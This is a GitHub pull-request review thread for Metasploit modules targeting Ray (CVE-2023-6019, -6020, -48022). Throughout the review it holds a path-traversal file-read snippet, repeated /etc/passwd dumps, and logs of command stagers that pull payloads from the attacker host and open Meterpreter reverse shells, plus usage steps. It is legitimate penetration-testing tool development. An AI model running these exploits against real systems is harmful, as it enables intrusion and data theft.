Add Ray module (CVE-2023-6019, CVE-2023-6020, CVE-2023-48022) #19363
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
dwelch-r7
reviewed
Aug 6, 2024
| [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ], | ||
| [ 'Linux aarch64', { 'Arch' => ARCH_AARCH64, 'Platform' => 'linux' } ] | ||
| ], | ||
| 'DefaultOptions' => { 'MeterpreterTryToFork' => true }, |
There was a problem hiding this comment.
is this required to be true? or why is it explicilty set as a default here?
There was a problem hiding this comment.
Thank you! See. c71894f
| register_options( | ||
| [ | ||
| Opt::RPORT(8265), | ||
| OptEnum.new('CVE', [true, 'The vulnerability to use', 'CVE-2023-6019', ['CVE-2023-6019', 'RCE', 'CVE-2023-6020']]), |
There was a problem hiding this comment.
I think this option is a little confusing mixing CVE-XXXX-XXXX and just RCE
I also wouldn't necessarily expect users to know which CVE they want to target, is there a more descriptive (but still short 😅 ) name we can use instead?
There was a problem hiding this comment.
Thank you! See. b7e4247
Comment on lines
69
to
70
| OptString.new('COMMAND', [ true, 'The command to execute', 'echo \'Hello from Metasploit\'' ]), | ||
| OptString.new('FILEPATH', [ true, 'File to read', '/etc/passwd']) |
There was a problem hiding this comment.
Suggested change
| OptString.new('COMMAND', [ true, 'The command to execute', 'echo \'Hello from Metasploit\'' ]), | |
| OptString.new('FILEPATH', [ true, 'File to read', '/etc/passwd']) | |
| OptString.new('COMMAND', [ false, 'The command to execute', 'echo \'Hello from Metasploit\'' ]), | |
| OptString.new('FILEPATH', [ false, 'File to read', '/etc/passwd']) |
I don't think both of these options are always required depending on the selected CVE/RCE, it wouldn't be clear to a user in which scenario each option is used either
It may be better to not mark them required and add in checks on the code paths where you are going to use that option
not super opinionated on this though, just throwing it out there
| @file_content = lfi | ||
| return Exploit::CheckCode::Safe if @file_content.nil? | ||
| end | ||
| Exploit::CheckCode::Appears |
There was a problem hiding this comment.
I don't think this check is strict enough for Appears maybe Detected but ideally if we can get a version number or something that'd be fantastic, just getting a response with data doesn't guarantee we're targeting the correct or a vulnerable service
There was a problem hiding this comment.
Thank you! See. 92e2694
| @job_data = get_job_data(datastore['COMMAND']) | ||
| return Exploit::CheckCode::Safe if @job_data.nil? | ||
| when 'CVE-2023-6020' | ||
| @file_content = lfi |
There was a problem hiding this comment.
I think this is actually performing the exploit right?
If that's right could return a Vulnerable check code
https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-write-a-check-method.html#check-codes
There was a problem hiding this comment.
Thank you! See. 4e99e7d
<=v2.6.3 == <v2.8.1
Takahiro-Yoko
changed the title
|
Offhand, this appears to be three different exploits in one module; is there a reason we should have them combined like this, or would it make sense to separate them into different modules to make searching and tracking easier? |
|
Thank you for your comment! |
dledda-r7
reviewed
Aug 19, 2024
There was a problem hiding this comment.
Hello! Thanks for splitting the modules.
I've left couple of comments.
auxiliary(gather/ray_lfi_cve_2023_602)
[*] Running module against 172.17.0.2
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
ray:x:1000:100::/home/ray:/bin/bash
[*] Auxiliary module execution completed
exploit(linux/http/ray_agent_job_rce)
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[+] Command execution successful. Job ID: 'raysubmit_Phm3XWUNTFt8Wctn' Submission ID: 'raysubmit_Phm3XWUNTFt8Wctn'
[*] Using URL: http://172.17.0.1:8080/fXdFxWa
[*] Command Stager progress - 100.00% done (110/110 bytes)
[*] Client 172.17.0.2 (Wget/1.20.3 (linux-gnu)) requested /fXdFxWa
[*] Sending payload to 172.17.0.2 (Wget/1.20.3 (linux-gnu))
[*] Sending stage (3045380 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.2:37352) at 2024-08-19 05:37:59 -0400
[*] Server stopped.
meterpreter > sysinfo
Computer : 172.17.0.2
OS : Ubuntu 20.04 (Linux 6.8.11-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: ray
meterpreter >
exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019)
msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > exploit
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[+] Grabbed node info, pid: 152, ip: 172.17.0.2
[*] Using URL: http://172.17.0.1:8080/J5281SDU
[*] Client 172.17.0.2 (Wget/1.20.3 (linux-gnu)) requested /J5281SDU
[*] Sending payload to 172.17.0.2 (Wget/1.20.3 (linux-gnu))
[*] Sending stage (3045380 bytes) to 172.17.0.2
[*] Meterpreter session 2 opened (172.17.0.1:4444 -> 172.17.0.2:44864) at 2024-08-19 06:16:38 -0400
[*] Command Stager progress - 100.00% done (111/111 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer : 172.17.0.2
OS : Ubuntu 20.04 (Linux 6.8.11-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: ray
meterpreter >
Comment on lines
47
to
52
| def check | ||
| @file_content = lfi | ||
| return Exploit::CheckCode::Safe if @file_content.nil? | ||
|
|
||
| Exploit::CheckCode::Vulnerable | ||
| end |
There was a problem hiding this comment.
I think the check method result should not be controlled by the 'FILEPATH' content.
msf6 auxiliary(gather/ray_lfi_cve_2023_6020) > set filepath /totally/not/a/goodpath
filepath => /totally/not/a/goodpath
msf6 auxiliary(gather/ray_lfi_cve_2023_6020) > check
[*] 172.17.0.2:8265 - The target is not exploitable.
msf6 auxiliary(gather/ray_lfi_cve_2023_6020) > set filepath /etc/passwd
filepath => /etc/passwd
msf6 auxiliary(gather/ray_lfi_cve_2023_6020) > check
[+] 172.17.0.2:8265 - The target is vulnerable.
msf6 auxiliary(gather/ray_lfi_cve_2023_6020)
After some investigation on the Ray website I have found an REST API endpoint that share the version number with us.
Suggested change
| def check | |
| @file_content = lfi | |
| return Exploit::CheckCode::Safe if @file_content.nil? | |
| Exploit::CheckCode::Vulnerable | |
| end | |
| def check | |
| res = send_request_cgi({ | |
| 'method' => 'GET', | |
| 'uri' => normalize_uri(target_uri.path, 'api/version') | |
| }) | |
| return Exploit::CheckCode::Unknown unless res && res.code == 200 | |
| ray_version = res.get_json_document['ray_version'] | |
| return Exploit::CheckCode::Unknown unless ray_version | |
| return Exploit::CheckCode::Safe unless Rex::Version.new(ray_version) <= Rex::Version.new('2.6.3') | |
| return Exploit::CheckCode::Appears | |
| end |
By looking our documentation the Exploit::CheckCode::Vulnerable is used when we have the proof we actually exploited the target, if you want also to add this. I may suggest to modify the lfi function to accept a filepath parameter to interpolate in the uri. Then when we execute the check we will pass /etc/passwd which should be ok in every system. In the exploit we will pass the datastore['FILEPATH'] value.
def check
...
return Exploit::CheckCode::Safe unless Rex::Version.new(ray_version) <= Rex::Version.new('2.6.3')
@file_content = lfi('/etc/passwd')
return Exploit::CheckCode::Vulnerable unless @file_content.nil?
return Exploit::CheckCode::Appears
end def lfi(filepath)
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "static/js/../../../../../../../../../../../../../..#{filepath}")
})
return unless res && res.code == 200
res.body
end def run
@file_content ||= lfi(datastore['FILEPATH'])
fail_with(Failure::Unknown, 'Failed to execute LFI') unless @file_content
print_good("#{datastore['FILEPATH']}\n#{@file_content}")
end
Comment on lines
78
to
83
| def check | ||
| @job_data = get_job_data('ls') | ||
| return Exploit::CheckCode::Safe if @job_data.nil? | ||
|
|
||
| Exploit::CheckCode::Detected | ||
| end |
There was a problem hiding this comment.
Here we can do the same to check also the version from /api/version
There was a problem hiding this comment.
Thank you! See. 5be7e09
Comment on lines
68
to
73
| def check | ||
| @nodes = get_nodes | ||
| return Exploit::CheckCode::Safe if @nodes.nil? | ||
|
|
||
| Exploit::CheckCode::Detected | ||
| end |
There was a problem hiding this comment.
Same as other the check methods in the PR.
There was a problem hiding this comment.
Thank you! See. a5b9d55
Avoid check method being controlled by the 'FILEPATH' content Co-authored-by: Diego Ledda <[email protected]>
dledda-r7
reviewed
Aug 21, 2024
There was a problem hiding this comment.
Hello @Takahiro-Yoko, I've spent some time to determinate if all versions of ray are vulnerable to the 3 modules, I've left some comments.
Ray 2.1.0
msf6 auxiliary(gather/ray_lfi_cve_2023_6020) > exploit
[*] Running module against 172.17.0.2
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
ray:x:1000:100::/home/ray:/bin/bash
[*] Auxiliary module execution completed
msf6 auxiliary(gather/ray_lfi_cve_2023_6020) >
Target: Linux x64
msf6 exploit(linux/http/ray_agent_job_rce) > exploit
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Command execution successful. Job ID: 'raysubmit_6n9HLxEzBBPSSgpW' Submission ID: 'raysubmit_6n9HLxEzBBPSSgpW'
[*] Using URL: http://172.17.0.1:8080/virV1DEcQq
[*] Command Stager progress - 100.00% done (113/113 bytes)
[*] Client 172.17.0.2 (Wget/1.20.3 (linux-gnu)) requested /virV1DEcQq
[*] Sending payload to 172.17.0.2 (Wget/1.20.3 (linux-gnu))
[*] Meterpreter session 7 opened (172.17.0.1:4444 -> 172.17.0.2:60042) at 2024-08-20 08:36:35 -0400
[*] Server stopped.
meterpreter > sysinfo
Computer : 172.17.0.2
OS : Ubuntu 20.04 (Linux 6.8.11-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: ray
meterpreter >
Target: Linux Command
msf6 exploit(linux/http/ray_agent_job_rce) > set MeterpreterTryToFork false
MeterpreterTryToFork => false
msf6 exploit(linux/http/ray_agent_job_rce) > exploit
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Command execution successful. Job ID: 'raysubmit_dgaPjrTfYmN47PUL' Submission ID: 'raysubmit_dgaPjrTfYmN47PUL'
[*] Meterpreter session 2 opened (172.17.0.1:4444 -> 172.17.0.2:49686) at 2024-08-21 04:57:42 -0400
meterpreter >
[*] 172.17.0.2 - Meterpreter session 2 closed. Reason: Died
msf6 exploit(linux/http/ray_agent_job_rce) > set MeterpreterTryToFork true
MeterpreterTryToFork => true
msf6 exploit(linux/http/ray_agent_job_rce) > exploit
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Command execution successful. Job ID: 'raysubmit_bDNJAr34dgvyJuJn' Submission ID: 'raysubmit_bDNJAr34dgvyJuJn'
[*] Meterpreter session 3 opened (172.17.0.1:4444 -> 172.17.0.2:53602) at 2024-08-21 04:59:00 -0400
meterpreter > sysinfo
Computer : 172.17.0.2
OS : Ubuntu 20.04 (Linux 6.8.11-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > exploit
[*] Started reverse TCP handler on 192.168.136.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[-] Exploit aborted due to failure: unknown: Failed to get pid
[*] Exploit completed, but no session was created.
Ray 2.3.1
msf6 auxiliary(gather/ray_lfi_cve_2023_6020) > exploit
[*] Running module against 172.17.0.2
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
ray:x:1000:100::/home/ray:/bin/bash
[*] Auxiliary module execution completed
msf6 auxiliary(gather/ray_lfi_cve_2023_6020) >
Target: Linux x64
msf6 exploit(linux/http/ray_agent_job_rce) > exploit
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Command execution successful. Job ID: 'raysubmit_WbqC47ujqrjf1Ve9' Submission ID: 'raysubmit_WbqC47ujqrjf1Ve9'
[*] Using URL: http://172.17.0.1:8080/BL9y0RF
[*] Command Stager progress - 100.00% done (110/110 bytes)
[*] Client 172.17.0.2 (Wget/1.20.3 (linux-gnu)) requested /BL9y0RF
[*] Sending payload to 172.17.0.2 (Wget/1.20.3 (linux-gnu))
[*] Sending stage (3045380 bytes) to 172.17.0.2
[*] Meterpreter session 8 opened (172.17.0.1:4444 -> 172.17.0.2:47238) at 2024-08-21 06:12:11 -0400
[*] Server stopped.
meterpreter > sysinfo
Computer : 172.17.0.2
OS : Ubuntu 20.04 (Linux 6.8.11-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: ray
meterpreter >
Target: Linux Command
msf6 exploit(linux/http/ray_agent_job_rce) > set MeterpreterTryToFork false
MeterpreterTryToFork => false
msf6 exploit(linux/http/ray_agent_job_rce) > exploit
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Command execution successful. Job ID: 'raysubmit_TEwTk4CWHtqqHW6R' Submission ID: 'raysubmit_TEwTk4CWHtqqHW6R'
[*] Sending stage (3045380 bytes) to 172.17.0.2
[*] Meterpreter session 10 opened (172.17.0.1:4444 -> 172.17.0.2:35420) at 2024-08-21 06:26:05 -0400
meterpreter >
[*] 172.17.0.2 - Meterpreter session 10 closed. Reason: Died
msf6 exploit(linux/http/ray_agent_job_rce) > set MeterpreterTryToFork true
MeterpreterTryToFork => true
msf6 exploit(linux/http/ray_agent_job_rce) > exploit
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Command execution successful. Job ID: 'raysubmit_ivTiipLc6w11XLBJ' Submission ID: 'raysubmit_ivTiipLc6w11XLBJ'
[*] Sending stage (3045380 bytes) to 172.17.0.2
[*] Meterpreter session 11 opened (172.17.0.1:4444 -> 172.17.0.2:50012) at 2024-08-21 06:26:18 -0400
meterpreter > sysinfo
Computer : 172.17.0.2
OS : Ubuntu 20.04 (Linux 6.8.11-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
Target: Linux x64
msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > exploit
[*] Started reverse TCP handler on 192.168.136.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Grabbed node info, pid: 300, ip: 172.17.0.2
[*] Using URL: http://192.168.136.128:8080/itqLW6vGVProd
[*] Client 172.17.0.2 (Wget/1.20.3 (linux-gnu)) requested /itqLW6vGVProd
[*] Sending payload to 172.17.0.2 (Wget/1.20.3 (linux-gnu))
[*] Sending stage (3045380 bytes) to 172.17.0.2
[*] Meterpreter session 4 opened (192.168.136.128:4444 -> 172.17.0.2:55988) at 2024-08-21 05:03:34 -0400
[*] Command Stager progress - 100.00% done (121/121 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer : 172.17.0.2
OS : Ubuntu 20.04 (Linux 6.8.11-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
Target: Linux Command
msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > exploit
[*] Started reverse TCP handler on 192.168.136.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Grabbed node info, pid: 300, ip: 172.17.0.2
[*] Meterpreter session 6 opened (192.168.136.128:4444 -> 172.17.0.2:51402) at 2024-08-21 05:17:55 -0400
meterpreter > sysinfo
Computer : 172.17.0.2
OS : Ubuntu 20.04 (Linux 6.8.11-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb
Show resolved
Hide resolved
use MeterpreterTryToFork to avoid a meterpreter session get killed Co-authored-by: Diego Ledda <[email protected]>
dledda-r7
approved these changes
Aug 22, 2024
There was a problem hiding this comment.
Retest after changes, looks good to me.
Ray 2.1.0
msf6 auxiliary(gather/ray_lfi_cve_2023_6020) > exploit
[*] Running module against 172.17.0.2
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
ray:x:1000:100::/home/ray:/bin/bash
[*] Auxiliary module execution completed
msf6 auxiliary(gather/ray_lfi_cve_2023_6020) >
msf6 exploit(linux/http/ray_agent_job_rce) > exploit
[*] Started reverse TCP handler on 192.168.136.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Command execution successful. Job ID: 'raysubmit_VHBcw3tC9m2YYN5A' Submission ID: 'raysubmit_VHBcw3tC9m2YYN5A'
[*] Using URL: http://192.168.136.128:8080/NXNvvzJ3oDsc
[*] Command Stager progress - 100.00% done (120/120 bytes)
[*] Client 172.17.0.2 (Wget/1.20.3 (linux-gnu)) requested /NXNvvzJ3oDsc
[*] Sending payload to 172.17.0.2 (Wget/1.20.3 (linux-gnu))
[*] Sending stage (3045380 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (192.168.136.128:4444 -> 172.17.0.2:39158) at 2024-08-22 07:09:14 -0400
[*] Server stopped.
meterpreter > sysinfo
Computer : 172.17.0.2
OS : Ubuntu 20.04 (Linux 6.8.11-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > exploit
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) >
Ray 2.6.3
msf6 auxiliary(gather/ray_lfi_cve_2023_6020) > exploit
[*] Running module against 172.17.0.2
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
ray:x:1000:100::/home/ray:/bin/bash
[*] Auxiliary module execution completed
msf6 exploit(linux/http/ray_agent_job_rce) > exploit
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Command execution successful. Job ID: 'raysubmit_5LN2YnQEDWND4AVY' Submission ID: 'raysubmit_5LN2YnQEDWND4AVY'
[*] Using URL: http://172.17.0.1:8080/MXVQj1BVgBh5io
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Client 172.17.0.2 (Wget/1.20.3 (linux-gnu)) requested /MXVQj1BVgBh5io
[*] Sending payload to 172.17.0.2 (Wget/1.20.3 (linux-gnu))
[*] Sending stage (3045380 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.2:55568) at 2024-08-22 07:29:11 -0400
[*] Server stopped.
meterpreter > exit
[*] Shutting down session: 1
[*] 172.17.0.2 - Meterpreter session 1 closed. Reason: User exit
msf6 exploit(linux/http/ray_agent_job_rce) > set TARGET "Linux Command"
TARGET => Linux Command
msf6 exploit(linux/http/ray_agent_job_rce) > exploit
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Command execution successful. Job ID: 'raysubmit_sgngzv1zQSYCVygq' Submission ID: 'raysubmit_sgngzv1zQSYCVygq'
[*] Meterpreter session 2 opened (172.17.0.1:4444 -> 172.17.0.2:52180) at 2024-08-22 07:29:54 -0400
meterpreter > sysinfo
Computer : 172.17.0.2
OS : Ubuntu 20.04 (Linux 6.8.11-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > exploit
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Grabbed node info, pid: 154, ip: 172.17.0.2
[*] Meterpreter session 3 opened (172.17.0.1:4444 -> 172.17.0.2:40380) at 2024-08-22 07:31:32 -0400
meterpreter > exit
[*] Shutting down session: 3
[*] 172.17.0.2 - Meterpreter session 3 closed. Reason: User exit
msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > set TARGET "Linux x64"
TARGET => Linux x64
msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > exploit
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Grabbed node info, pid: 154, ip: 172.17.0.2
[*] Using URL: http://172.17.0.1:8080/afDM4TV
[*] Client 172.17.0.2 (Wget/1.20.3 (linux-gnu)) requested /afDM4TV
[*] Sending payload to 172.17.0.2 (Wget/1.20.3 (linux-gnu))
[*] Sending stage (3045380 bytes) to 172.17.0.2
[*] Meterpreter session 4 opened (172.17.0.1:4444 -> 172.17.0.2:51120) at 2024-08-22 07:33:09 -0400
[*] Command Stager progress - 100.00% done (110/110 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer : 172.17.0.2
OS : Ubuntu 20.04 (Linux 6.8.11-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
Release NotesThis adds two exploit modules and one auxiliary module for ray. The two exploit modules allow to remotely execute arbitrary commands on the targeted system through command injection. The auxiliary module allows to read files on the remote system through a local file inclusion vulnerability. |
dledda-r7
changed the title
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
This PR should close #18584
Vulnerable Application
Ray (<=v2.6.3) is vulnerable to three vulnerabilities:
These modules exploit all three vulnerabilities.
The vulnerabilities affects:
This module was successfully tested on:
Install and run the vulnerable Ray (v2.6.3)
docker pull rayproject/ray:2.6.3docker run --shm-size=512M -it -p 8265:8265 rayproject/ray:2.6.3ray start --head --dashboard-host=0.0.0.0Verification Steps
ray_cpu_profile_cmd_injection_cve_2023_6019
use exploit/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019set rhost <rhost>set lhost <attacker-ip>runray_agent_job_rce
use exploit/linux/http/ray_agent_job_rceset rhost <rhost>set lhost <attacker-ip>runray_lfi_cve_2023_6020
use auxiliary/gather/ray_lfi_cve_2023_6020set rhost <rhost>run